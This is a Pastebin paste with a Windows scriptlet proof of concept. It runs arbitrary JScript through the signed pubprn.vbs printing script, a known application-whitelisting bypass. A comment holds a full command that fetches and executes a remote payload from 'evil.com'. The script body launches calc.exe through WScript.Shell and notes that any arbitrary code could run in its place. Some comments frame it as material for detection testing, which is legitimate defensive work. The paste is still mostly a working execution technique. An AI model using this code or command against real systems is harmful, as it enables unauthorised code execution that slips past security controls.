Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?XML version="1.0"?>
- <scriptlet>
- <registration
- progid="PoC"
- classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
- <!-- cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:http://evil.com/payload.sct" -->
- <!-- .sct files when downloaded, are executed from a path like this -->
- <!-- Please Note, file extenstion does not matter -->
- <!-- Though, the name and extension are arbitary.. -->
- <!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
- <!-- Based on current research, no registry keys are written, since call "uninstall" -->
- <!-- You can either execute locally, or from a url -->
- <script language="JScript">
- <![CDATA[
- // calc.exe should launch, this could be any arbitrary code.
- // What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
- var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
- ]]>
- </script>
- </registration>
- </scriptlet>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement